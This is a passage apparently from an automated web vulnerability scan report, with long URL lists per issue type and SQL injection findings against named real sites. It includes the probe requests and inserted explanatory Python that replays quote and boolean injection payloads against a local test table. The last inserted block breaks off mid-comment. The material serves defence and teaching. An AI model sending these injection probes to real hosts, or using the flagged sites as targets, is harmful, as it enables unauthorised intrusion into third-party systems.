24.214. http://www.sourceconference.com/about/press.asp

24.215. http://www.sourceconference.com/about/team.asp

24.216. http://www.sourceconference.com/boston/

24.217. http://www.sourceconference.com/boston/evening.asp

24.218. http://www.sourceconference.com/boston/mentors.asp

24.219. http://www.sourceconference.com/boston/speakers_2009.asp

24.220. http://www.sourceconference.com/boston/sponsors.asp

24.221. http://www.sourceconference.com/boston/student.asp

24.222. http://www.sourceconference.com/seattle/travel.asp

24.223. http://www.southparkstudios.com/

24.224. http://www.southparkstudios.com/account/login

24.225. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

24.226. http://www.southparkstudios.com/guide/episodes/

24.227. http://www.southparkstudios.com/layout/common/js/widgets/twitter.js

24.228. http://www.viglink.com/

24.229. http://www.viglink.com/about

24.230. http://www.viglink.com/corp/merchants

24.231. http://www.viglink.com/corp/publishers

24.232. http://www.viglink.com/demo

24.233. http://www.viglink.com/jobs

24.234. http://www.viglink.com/partners

24.235. http://www.viglink.com/policies/ftc

24.236. http://www.viglink.com/policies/privacy

24.237. http://www.viglink.com/policies/tos

24.238. http://www.viglink.com/support/api

24.239. http://www.viglink.com/support/faq

24.240. http://www.viglink.com/users/login

24.241. http://www.viglink.com/users/send-verification

24.242. http://www.viglink.com/users/signup

24.243. https://www.viglink.com/users/action/login

24.244. http://www.vs-db.info/

24.245. http://www.weather.gov/climate/index.php

24.246. http://www.weather.gov/climate/info.php

24.247. http://www.weather.gov/climate/local_data.php

24.248. http://www.weather.gov/forecasts/graphical/images//MaxT1_.png

24.249. http://www.weather.gov/forecasts/wfo/images//MaxT1_.png

24.250. http://www.weather.gov/view/largemap.php

24.251. http://www.weather.gov/view/national.php

24.252. http://www.weather.gov/view/nationalwarnings.php

24.253. http://www.weather.gov/view/states.php

24.254. http://www.weather.gov/view/survey/nws-survey.php

24.255. http://www.weather.gov/view/validProds.php

24.256. http://www.wrh.noaa.gov/sew/main.php

24.257. http://www.wrh.noaa.gov/sew/main.php

24.258. http://www2.comscore.com/js/prototype.js

24.259. http://www22.verizon.com/privacy/

24.260. http://www4.tinker.com/standard/js/curvycorners.js

25. Private IP addresses disclosed

25.1. http://www.activeendurance.com/running.htm

25.2. http://www.activegovernment.com/marketing-services/municipal-marketing.htm

25.3. http://www.adobe.com/support/security/advisories/apsa11-01.html

25.4. http://www.adobe.com/support/security/advisories/apsa11-02.html

25.5. http://www.cisco.com/en/US/docs/security/nac/guestserver/release_notes/20/gsrn20.html

25.6. http://www.facebook.com/2008/fbml

25.7. http://www.facebook.com/angie.eronson

25.8. http://www.facebook.com/campaign/landing.php

25.9. http://www.facebook.com/campaign/landing.php

25.10. http://www.facebook.com/chester.mitre

25.11. http://www.facebook.com/extern/login_status.php

25.12. http://www.facebook.com/extern/login_status.php

25.13. http://www.facebook.com/extern/login_status.php

25.14. http://www.facebook.com/extern/login_status.php

25.15. http://www.facebook.com/extern/login_status.php

25.16. http://www.facebook.com/extern/login_status.php

25.17. http://www.facebook.com/extern/login_status.php

25.18. http://www.facebook.com/extern/login_status.php

25.19. http://www.facebook.com/extern/login_status.php

25.20. http://www.facebook.com/extern/login_status.php

25.21. http://www.facebook.com/extern/login_status.php

25.22. http://www.facebook.com/extern/login_status.php

25.23. http://www.facebook.com/extern/login_status.php

25.24. http://www.facebook.com/extern/login_status.php

25.25. http://www.facebook.com/extern/login_status.php

25.26. http://www.facebook.com/extern/login_status.php

25.27. http://www.facebook.com/extern/login_status.php

25.28. http://www.facebook.com/extern/login_status.php

25.29. http://www.facebook.com/pages/Glamcom/144180538945796

25.30. http://www.facebook.com/pages/Theron-Zahn-KOMO/180364211988503

25.31. http://www.facebook.com/plugins/activity.php

25.32. http://www.facebook.com/plugins/activity.php

25.33. http://www.facebook.com/plugins/activity.php

25.34. http://www.facebook.com/plugins/activity.php

25.35. http://www.facebook.com/plugins/activity.php

25.36. http://www.facebook.com/plugins/activity.php

25.37. http://www.facebook.com/plugins/activity.php

25.38. http://www.facebook.com/plugins/activity.php

25.39. http://www.facebook.com/plugins/activity.php

25.40. http://www.facebook.com/plugins/activity.php

25.41. http://www.facebook.com/plugins/activity.php

25.42. http://www.facebook.com/plugins/activity.php

25.43. http://www.facebook.com/plugins/facepile.php

25.44. http://www.facebook.com/plugins/facepile.php

25.45. http://www.facebook.com/plugins/like.php

25.46. http://www.facebook.com/plugins/like.php

25.47. http://www.facebook.com/plugins/like.php

25.48. http://www.facebook.com/plugins/like.php

25.49. http://www.facebook.com/plugins/like.php

25.50. http://www.facebook.com/plugins/like.php

25.51. http://www.facebook.com/plugins/like.php

25.52. http://www.facebook.com/plugins/like.php

25.53. http://www.facebook.com/plugins/like.php

25.54. http://www.facebook.com/plugins/like.php

25.55. http://www.facebook.com/plugins/like.php

25.56. http://www.facebook.com/plugins/like.php

25.57. http://www.facebook.com/plugins/like.php

25.58. http://www.facebook.com/plugins/like.php

25.59. http://www.facebook.com/plugins/like.php

25.60. http://www.facebook.com/plugins/like.php

25.61. http://www.facebook.com/plugins/like.php

25.62. http://www.facebook.com/plugins/like.php

25.63. http://www.facebook.com/plugins/like.php

25.64. http://www.facebook.com/plugins/like.php

25.65. http://www.facebook.com/plugins/like.php

25.66. http://www.facebook.com/plugins/like.php

25.67. http://www.facebook.com/plugins/like.php

25.68. http://www.facebook.com/plugins/like.php

25.69. http://www.facebook.com/plugins/like.php

25.70. http://www.facebook.com/plugins/likebox.php

25.71. http://www.facebook.com/plugins/likebox.php

25.72. http://www.facebook.com/plugins/likebox.php

25.73. http://www.facebook.com/plugins/likebox.php

25.74. http://www.facebook.com/plugins/likebox.php

25.75. http://www.facebook.com/profile.php

25.76. http://www.facebook.com/viglink

25.77. http://www.facebook.com/widgets/recommendations.php

25.78. http://www.google.com/sdch/rU20-FBA.dct

25.79. http://www.southparkstudios.com/

25.80. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

25.81. http://www.ups.com/europe/fr/freindex.html

25.82. http://www.viglink.com/

25.83. http://www.viglink.com/about

25.84. http://www.viglink.com/corp/merchants

25.85. http://www.viglink.com/corp/merchants

25.86. http://www.viglink.com/corp/publishers

25.87. http://www.viglink.com/corp/publishers

25.88. http://www.viglink.com/demo

25.89. http://www.viglink.com/demo

25.90. http://www.viglink.com/jobs

25.91. http://www.viglink.com/partners

25.92. http://www.viglink.com/partners

25.93. http://www.viglink.com/policies/ftc

25.94. http://www.viglink.com/policies/privacy

25.95. http://www.viglink.com/policies/privacy

25.96. http://www.viglink.com/policies/tos

25.97. http://www.viglink.com/support/api

25.98. http://www.viglink.com/support/api

25.99. http://www.viglink.com/support/faq

25.100. http://www.viglink.com/users/login

25.101. http://www.viglink.com/users/login

25.102. http://www.viglink.com/users/send-verification

25.103. http://www.viglink.com/users/send-verification

25.104. http://www.viglink.com/users/signup

25.105. http://www.viglink.com/users/signup

25.106. https://www.viglink.com/users/action/login

25.107. http://www35.glam.com/gad/glamadapt_jsrv.act

25.108. http://www35.glam.com/gad/glamadapt_jsrv.act

25.109. http://www35.glam.com/gad/glamadapt_jsrv.act

25.110. http://www35.glam.com/gad/glamadapt_jsrv.act

25.111. http://www35.glam.com/gad/glamadapt_jsrv.act

25.112. http://www35.glam.com/gad/glamadapt_jsrv.act

25.113. http://www35.glam.com/gad/glamadapt_jsrv.act

25.114. http://www35.glam.com/gad/glamadapt_jsrv.act

25.115. http://www35.glam.com/gad/glamadapt_jsrv.act

25.116. http://www35.glam.com/gad/glamadapt_jsrv.act

25.117. http://www35.glam.com/gad/glamadapt_jsrv.act

25.118. http://www35.glam.com/gad/glamadapt_jsrv.act

25.119. http://www35.glam.com/gad/glamadapt_jsrv.act

25.120. http://www35.glam.com/gad/glamadapt_jsrv.act

25.121. http://www35.glam.com/gad/glamadapt_jsrv.act

25.122. http://www35.glam.com/gad/glamadapt_jsrv.act

25.123. http://www35.glam.com/gad/glamadapt_jsrv.act

25.124. http://www35.glam.com/gad/glamadapt_jsrv.act

25.125. http://www35.glam.com/gad/glamadapt_jsrv.act

25.126. http://www35.glam.com/gad/glamadapt_jsrv.act

25.127. http://www35.glam.com/gad/glamadapt_jsrv.act

25.128. http://www35.glam.com/gad/glamadapt_jsrv.act

25.129. http://www35.glam.com/gad/glamadapt_jsrv.act

25.130. http://www35.glam.com/gad/glamadapt_jsrv.act

25.131. http://www35.glam.com/gad/glamadapt_jsrv.act

25.132. http://www35.glam.com/gad/glamadapt_jsrv.act

25.133. http://www35.glam.com/gad/glamadapt_jsrv.act

25.134. http://www35.glam.com/gad/glamadapt_jsrv.act

25.135. http://www35.glam.com/gad/glamadapt_jsrv.act

25.136. http://www35.glam.com/gad/glamadapt_jsrv.act

25.137. http://www35.glam.com/gad/glamadapt_jsrv.act

25.138. http://www35.glam.com/gad/glamadapt_jsrv.act

25.139. http://www35.glam.com/gad/glamadapt_jsrv.act

25.140. http://www35.glam.com/gad/glamadapt_jsrv.act

25.141. http://www35.glam.com/gad/glamadapt_jsrv.act

25.142. http://www35.glam.com/gad/glamadapt_jsrv.act

25.143. http://www35.glam.com/gad/glamadapt_jsrv.act

25.144. http://www35.glam.com/gad/glamadapt_jsrv.act

25.145. http://www35.glam.com/gad/glamadapt_jsrv.act

25.146. http://www35.glam.com/gad/glamadapt_jsrv.act

25.147. http://www35.glam.com/gad/glamadapt_jsrv.act

25.148. http://www35.glam.com/gad/glamadapt_jsrv.act

25.149. http://www35.glam.com/gad/glamadapt_jsrv.act

25.150. http://www35.glam.com/gad/glamadapt_jsrv.act

25.151. http://www35.glam.com/gad/glamadapt_jsrv.act

25.152. http://www35.glam.com/gad/glamadapt_jsrv.act

25.153. http://www35.glam.com/gad/glamadapt_jsrv.act

25.154. http://www35.glam.com/gad/glamadapt_jsrv.act

25.155. http://www4.tinker.com/standard/js/map/mappref.js

26. Credit card numbers disclosed

26.1. http://www.bing.com/search

26.2. http://www.komonews.com/news/health

26.3. http://www.komonews.com/younews/116761799.html

26.4. http://www.massey-coldbeck.co.uk/zoom_index.js

26.5. http://www.opxconsulting.com/images/pdf/arizona_public_service.pdf

26.6. http://www.opxconsulting.com/images/pdf/cnp.pdf

26.7. http://www.slideshare.net/

26.8. http://www.slideshare.net/AutoSurfRestarter/lyle-lite-16-easy-chord-solos-arranged-by-ukulele-jazz-master-jumpin-jims-ukulele-masters-by-lyle

26.9. http://www.slideshare.net/AutoSurfRestarter/lyle-lyle-crocodile-lyle-the-crocodile-by-bernard-waber

26.10. http://www.slideshare.net/Mzyra/ryman-legacy-chapter-10c

26.11. http://www.slideshare.net/VigLink

26.12. http://www.slideshare.net/VigLink/2-dan-gill-huddler

26.13. http://www.slideshare.net/VigLink/3-ray-lyleviglink-forumcon-ppt1

26.14. http://www.slideshare.net/betdelmar/pinta-tu-vida-presentation-609143

26.15. http://www.slideshare.net/lylevjohnson/florida-scenes-3210581

26.16. http://www.slideshare.net/tinamomo/christinaliu-5400505

26.17. http://www.slideshare.net/tinamomo/cl01

26.18. http://www.slideshare.net/tinamomo/cl02

26.19. http://www.slideshare.net/tinamomo/cl03-5400934

27. Robots.txt file

27.1. http://www.awin1.com/cread.php

27.2. http://www.barracudalabs.com/

27.3. http://www.bing.com/

27.4. http://www.bizographics.com/collect/

27.5. http://www.brash.com/

27.6. http://www.google-analytics.com/__utm.gif

27.7. http://www.googleadservices.com/pagead/conversion/1045336492/

27.8. http://www.insideup.com/openx/www/delivery/ajs.php

27.9. http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc

27.10. http://www.metropcs.com/

27.11. http://www.microsoft.com/technet/security/bulletin/alertus.aspx

27.12. http://www.microsoftstore.com/store/msstore/en_US/buy/pageType.product/externalRefID.8D6DDFB5

27.13. http://www.murraynewlands.com/

27.14. http://www.net-security.org/

27.15. http://www.opensource.org/licenses/gpl-license.php

27.16. http://www.purewire.com/

27.17. http://www.regonline.com/Register/Checkin.aspx

27.18. https://www.regonline.com/Register/Checkin.aspx

27.19. http://www.reputation.com/min/

27.20. https://www.reputation.com/products

27.21. http://www.rsa.com/

27.22. http://www.securityfocus.com/bid/47092/

27.23. http://www.socialfollow.com/blog/wp-content/plugins/wp-email/email-css.css

27.24. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

27.25. https://www.viglink.com/users/action/login

27.26. http://www.wildwest2.com/favicon.ico

27.27. http://www.zynga.com/

27.28. http://yardbarker.tags.crwdcntrl.net/cc.js

28. Cacheable HTTPS response

28.1. https://www.barracudanetworks.com/ns/get_states_for_country.php

28.2. https://www.barracudanetworks.com/ns/products/request_eval_unit.php

28.3. https://www.demandstudios.com/application.html

28.4. https://www.eff.org/

28.5. https://www.google.com/adsense/support/bin/request.py

28.6. https://www.regonline.com/

28.7. https://www.regonline.com/__images/global/favicon.ico

28.8. https://www.regonline.com/__js.axd

28.9. https://www.rei.com/favicon.ico

28.10. https://www.reputation.com/fonts/museo_sans/woff/8eff19a509bda9cced7ef4042059bdb7.woff

28.11. https://www.reputation.com/fonts/museo_sans/woff/be29def0d790180f0854fa62b8b12182.woff

28.12. https://www.reputation.com/fonts/museo_sans/woff/eda63a6ee6304b30ff670d77f33286f8.woff

28.13. https://www.sitefinity.com/login.aspx

29. Multiple content types specified

30. HTML does not specify charset

30.1. http://www.4shared.com/advertise/banners/desktop/300x250.jsp

30.2. http://www.4shared.com/advertise/banners/desktop/728x90.jsp

30.3. http://www.attackresearch.com/

30.4. http://www.awin1.com/cread.php

30.5. https://www.barracudanetworks.com/ns/get_states_for_country.php

30.6. http://www.caribbean-ocean.com/

30.7. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

30.8. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

30.9. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/stylesheet.css

30.10. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif

30.11. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg

30.12. http://www.caribbean-ocean.com/enq.php/stylesheet.css

30.13. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

30.14. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

30.15. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css

30.16. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif

30.17. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg

30.18. http://www.caribbean-ocean.com/get-in-touch.php/stylesheet.css

30.19. http://www.caribbean-ocean.com/styles.css

30.20. http://www.caribbean-ocean.com/stylesheet.css

30.21. http://www.caribbean-ocean.com/tabs.js

30.22. http://www.coach.com/wcsstore/Coach_US/scripts/GWT/C8CD5EE6AB91C7A8DC36FB96A08AB26A.cache.html

30.23. http://www.crh.noaa.gov/product.php

30.24. https://www.digitalbond.com/favicon.ico

30.25. http://www.internetnews.com/img/blog/gradient.gif

30.26. http://www.inversepath.com/

30.27. http://www.longislanderotic.com/favicon.ico

30.28. http://www.manta.com/manta/mads/generic.html

30.29. http://www.massey-coldbeck.co.uk/favicon.ico

30.30. http://www.massey-coldbeck.co.uk/images/2col_rightNav.css

30.31. http://www.massey-coldbeck.co.uk/images/images/menu/menu_.js

30.32. http://www.massey-coldbeck.co.uk/images/logo_cemp.gif

30.33. http://www.metropcs.com/assets/v3/fonts/helveticaneueltstd-bdcn-webfont.woff

30.34. http://www.navcen.uscg.gov/

30.35. http://www.nutter.com/attorneys.php

30.36. http://www.nutter.com/careers.php

30.37. http://www.nutter.com/home.php

30.38. http://www.nutter.com/media/swf/media/industries/media.212.jpg

30.39. http://www.opxconsulting.com/favicon.ico

30.40. http://www.pwnieexpress.com/

30.41. http://www.skichalets.co.uk/top/Crossfader.js

30.42. http://www.socialfollow.com/js/flash-detect.js

30.43. http://www.socialfollow.com/js/jquery.js

30.44. http://www.socialfollow.com/js/thickbox.js

30.45. http://www.socialfollow.com/js/validator.js

30.46. http://www.sourceconference.com/

30.47. http://www.sourceconference.com/about/

30.48. http://www.sourceconference.com/about/contact.asp

30.49. http://www.sourceconference.com/about/default.asp

30.50. http://www.sourceconference.com/about/policies.asp

30.51. http://www.sourceconference.com/about/press.asp

30.52. http://www.sourceconference.com/about/team.asp

30.53. http://www.sourceconference.com/barcelona/speakers_2009.asp

30.54. http://www.sourceconference.com/barcelona/speakers_2010.asp

30.55. http://www.sourceconference.com/barcelona/sponsors.asp

30.56. http://www.sourceconference.com/barcelona/training.asp

30.57. http://www.sourceconference.com/barcelona/travel.asp

30.58. http://www.sourceconference.com/boston/

30.59. http://www.sourceconference.com/boston/evening.asp

30.60. http://www.sourceconference.com/boston/mentors.asp

30.61. http://www.sourceconference.com/boston/ptes.asp

30.62. http://www.sourceconference.com/boston/speakers_2008.asp

30.63. http://www.sourceconference.com/boston/speakers_2009.asp

30.64. http://www.sourceconference.com/boston/speakers_2010.asp

30.65. http://www.sourceconference.com/boston/speakers_2011.asp

30.66. http://www.sourceconference.com/boston/sponsors.asp

30.67. http://www.sourceconference.com/boston/student.asp

30.68. http://www.sourceconference.com/boston/travel.asp

30.69. http://www.sourceconference.com/merchandise/

30.70. http://www.sourceconference.com/merchandise/artist.asp

30.71. http://www.sourceconference.com/seattle/speakers_2011.asp

30.72. http://www.sourceconference.com/seattle/sponsors.asp

30.73. http://www.sourceconference.com/seattle/travel.asp

30.74. http://www.southparkstudios.com/layout/skin_v3/css/img/cmn/tabs_bg.gif

30.75. http://www.southparkstudios.com/layout/skin_v3jq/css/img/upload/upload_logo_big.jpg

30.76. http://www22.verizon.com/privacy/

30.77. http://www30a2.glam.com/gad/click.act

30.78. http://www4.tinker.com/xd_receiver.htm

30.79. http://www5.jcpenney.com/jcp/css/EstimatedShippingStyles.css

30.80. http://xads.zedo.com/ads3/a

31. HTML uses unrecognised charset

31.1. http://www.barracudacentral.org/

31.2. http://www.weather.gov/view/largemap.php

32. Content type incorrectly stated

32.1. http://www.apache.org/licenses/LICENSE-2.0

32.2. http://www.awin1.com/cread.php

32.3. http://www.barracudanetworks.com/ns/products/gfx/bwb_thumb.gif

32.4. https://www.barracudanetworks.com/ns/get_states_for_country.php

32.5. http://www.bizfind.us/robots.txt

32.6. http://www.bizographics.com/collect/

32.7. http://www.bluefountainmedia.com/favicon.ico

32.8. http://www.bluefountainmedia.com/upload/tinymce/in_the_press.jpg

32.9. http://www.briangardner.com/wp-content/themes/brian_gardner/images/favicon.ico

32.10. http://www.caribbean-ocean.com/styles.css

32.11. http://www.caribbean-ocean.com/stylesheet.css

32.12. http://www.caribbean-ocean.com/tabs.js

32.13. http://www.cudaeye.com/service/user-status.json

32.14. http://www.erh.noaa.gov/favicon.ico

32.15. http://www.erh.noaa.gov/forecast/wxplanner.php

32.16. http://www.erh.noaa.gov/gyx/favicon.ico

32.17. http://www.erh.noaa.gov/wwamap/wwatxtget.php

32.18. http://www.facebook.com/extern/login_status.php

32.19. http://www.glam.com/logincheck.php

32.20. http://www.glam.com/wp-content/themes/glam_v1/glam-lib/geoipRedirect/redirect.php

32.21. http://www.glam.com/wp-content/themes/glam_v1/glam_latest_post_thumb.php

32.22. http://www.google.com/mbd

32.23. http://www.google.com/realtimejs

32.24. http://www.google.com/recaptcha/api/reload

32.25. http://www.insideup.com/ppc/leadflow/style/blackdot.gif

32.26. http://www.insideup.com/ppc/leadflow/sys_images/min.gif

32.27. http://www.insideup.com/ppc/leadflow/sys_images/resize.gif

32.28. http://www.insideup.com/updateCity.html

32.29. http://www.insideup.com/wikiHeaderCity.html

32.30. http://www.intensedebate.com/js/getCommentLink.php

32.31. http://www.leanlogistics.com/favicon.ico

32.32. http://www.massey-coldbeck.co.uk/zoom_titles.js

32.33. http://www.metropcs.com/assets/v3/fonts/helveticaneueltstd-bdcn-webfont.woff

32.34. http://www.quantcast.com/wpapi/menus

32.35. http://www.rei.com/favicon.ico

32.36. http://www.rei.com/pix/memberRewards/2010/sm6314lead.gif

32.37. https://www.rei.com/favicon.ico

32.38. http://www.reputation.com/fonts/museo_sans/woff/be29def0d790180f0854fa62b8b12182.woff

32.39. http://www.reputation.com/fonts/museo_sans/woff/eda63a6ee6304b30ff670d77f33286f8.woff

32.40. http://www.reputation.com/services/ajax_updateShoppingCart.php

32.41. https://www.reputation.com/fonts/museo_sans/woff/8eff19a509bda9cced7ef4042059bdb7.woff

32.42. https://www.reputation.com/fonts/museo_sans/woff/be29def0d790180f0854fa62b8b12182.woff

32.43. https://www.reputation.com/fonts/museo_sans/woff/eda63a6ee6304b30ff670d77f33286f8.woff

32.44. http://www.skichalets.co.uk/top/Crossfader.js

32.45. http://www.socialfollow.com/js/flash-detect.js

32.46. http://www.socialfollow.com/js/jquery.js

32.47. http://www.socialfollow.com/js/thickbox.js

32.48. http://www.socialfollow.com/js/validator.js

32.49. http://www.southparkstudios.com/layout/skin_v3/css/img/cmn/tabs_bg.gif

32.50. http://www.southparkstudios.com/layout/skin_v3jq/css/img/upload/upload_logo_big.jpg

32.51. http://www.weather.gov/favicon.ico

32.52. http://www.wrh.noaa.gov/favicon.ico

32.53. http://www2.comscore.com/analytics

32.54. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

32.55. http://www2.jcpenney.com/jcp/vbscript/AmsScript.vbs

32.56. http://www24a.glam.com/appdir/resources/rendergadget.js

32.57. http://www25.glam.com/appdir/resources/rendergadget.js

32.58. http://www35.glam.com/favicon.ico

32.59. http://www4.jcpenney.com/images/seasonal/facebook_icon.gif

32.60. http://www4.jcpenney.com/images/seasonal/kaboodle_icon.gif

32.61. http://www4.jcpenney.com/images/seasonal/myspace_icon.gif

32.62. http://www4.jcpenney.com/images/seasonal/stylehive_icon.gif

32.63. http://www4.jcpenney.com/jcp/CSS/ProdList.css

32.64. http://www4.jcpenney.com/jcp/vbscript/AmsScript.vbs

32.65. http://www4.tinker.com/standard/event_timeline/

32.66. http://www4.tinker.com/standard/img/ajax-loader-mslogout-wht.gif

32.67. http://www5.jcpenney.com/jcp/vbscript/AmsScript.vbs

33. Content type is not specified

33.1. http://www.4shared.com/favicon.ico

33.2. http://www.bizfind.us/

33.3. http://www25.glam.com/files/gadget-store/installs/84371626942385/flvpath_2-73131245.flv



1. SQL injection
There are 32 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
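The following is an added example, not code from the report or from any of the scanned sites. It puts the string-spliced query beside the parameterised one and replays the two probe families this report relies on: the lone-quote versus doubled-quote test behind the error-based findings (1.1, 1.3) and the ' and 1=1-- versus ' and 1=2-- test behind the boolean-based finding (1.2). SQLite stands in for the SQL Server and other backends on the scanned hosts; the products table, the rows in it and the function names are all assumptions made for the example. The doubled quote is the standard SQL escape for a quote inside a literal, which is why the error disappears on the second request in 1.1 and 1.3.

```python
import sqlite3

# Constructed sample data (not from the report): a small product table that
# stands in for whatever backend the scanned hosts query.
SAMPLE_ROWS = [
    (1, "driver", "golf"),
    (2, "putter", "golf"),
    (3, "rain jacket", "apparel"),
]


def make_db():
    """Return an in-memory SQLite database seeded with SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, category TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, category):
    """Vulnerable pattern: the input is spliced into the SQL text. A quote in
    `category` closes the string literal and whatever follows is parsed as SQL,
    which is exactly what the report's probes exploit."""
    sql = "SELECT id, name FROM products WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, category):
    """Remediated pattern: the query structure is fixed first and the input is
    bound to a placeholder, so the database never parses it as SQL."""
    sql = "SELECT id, name FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


def _attempt(lookup, conn, value):
    """Run one probe and report either ('ok', rows) or ('error', exception name)."""
    try:
        return ("ok", lookup(conn, value))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


def probe(lookup, conn, base="golf"):
    """Replay the two probe families used in the report against `lookup`.

    Error-based (1.1, 1.3): a lone quote should raise a syntax error while a
    doubled quote, which is a valid escaped quote inside the literal, should not.
    Boolean-based (1.2): ' and 1=1-- and ' and 1=2-- should produce different
    results only if the tail is evaluated as SQL.
    """
    single = _attempt(lookup, conn, base + "'")
    double = _attempt(lookup, conn, base + "''")
    true_case = _attempt(lookup, conn, base + "' and 1=1-- ")
    false_case = _attempt(lookup, conn, base + "' and 1=2-- ")
    return {
        "error_on_single_quote": single[0] == "error",
        "error_on_double_quote": double[0] == "error",
        "boolean_responses_differ": true_case != false_case,
    }


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(lookup_vulnerable, db))
    print("parameterised:", probe(lookup_safe, db))
```

Against lookup_vulnerable the probe reports an error on the single quote, no error on the doubled quote, and different results for the two boolean payloads; against lookup_safe all three flags are false because every payload is matched as a literal category name and simply returns no rows.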

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.adidasgolf.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.adidasgolf.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.adidasgolf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6332
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 02:28:00 GMT
Connection: close

<html>
<head>
<title>The expression contains an invalid string constant: '.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...
</b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.adidasgolf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12027
Date: Sat, 26 Feb 2011 02:28:01 GMT
Connection: close
Set-Cookie: AuthCookie=; expires=Thu, 26-Feb-1981 02:28:01 GMT; path=/
Set-Cookie: ASP.NET_SessionId=luu5hmm2dkmxwa3cvhectaee; path=/; HttpOnly
Set-Cookie: LastPage=none; expires=Sun, 26-Feb-2012 02:28:01 GMT; path=/
Set-Cookie: CurrentPage=/default.aspx?1''=1; expires=Sun, 26-Feb-2012 02:28:01 GMT; path=/
Set-Cookie: CurrentPage=/default.aspx?1''=1; expires=Sun, 26-Feb-2012 02:28:01 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   adidasGolf.c
...[SNIP]...

1.2. http://www.bing.com/local/details.aspx [SRCHUID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bing.com
Path:   /local/details.aspx

Issue detail

The SRCHUID cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the SRCHUID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
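The two responses below differ in Content-Length (282556 versus 282568), X-BM-TraceID, the BID and CID cookies, and the IG and EventID values in the inline _G object, all of which are per-request identifiers that change whether or not the cookie reaches a query. A first step in the manual review the note asks for is to strip that noise and see whether anything is left. The following is an added example, not part of the report: it normalises two raw responses by dropping volatile headers and masking the identifier tokens, then diffs what remains. The responses it runs on are constructed in the shape of this pair rather than real captures, and the volatile-header list and the two body patterns are assumptions; a real page will need more rules, and an empty diff after normalisation only says this pair is not evidence, not that the host is safe.

```python
import re
from difflib import unified_diff

# Headers whose values legitimately change between two requests and so say
# nothing about whether the injected SQL was evaluated.
VOLATILE_HEADERS = {
    "date", "expires", "last-modified", "content-length",
    "set-cookie", "x-bm-traceid", "x-bm-srv",
}

# Body tokens that are per-request identifiers in the 1.2 responses (the IG and
# EventID fields of the inline _G object). Assumption: these are the only
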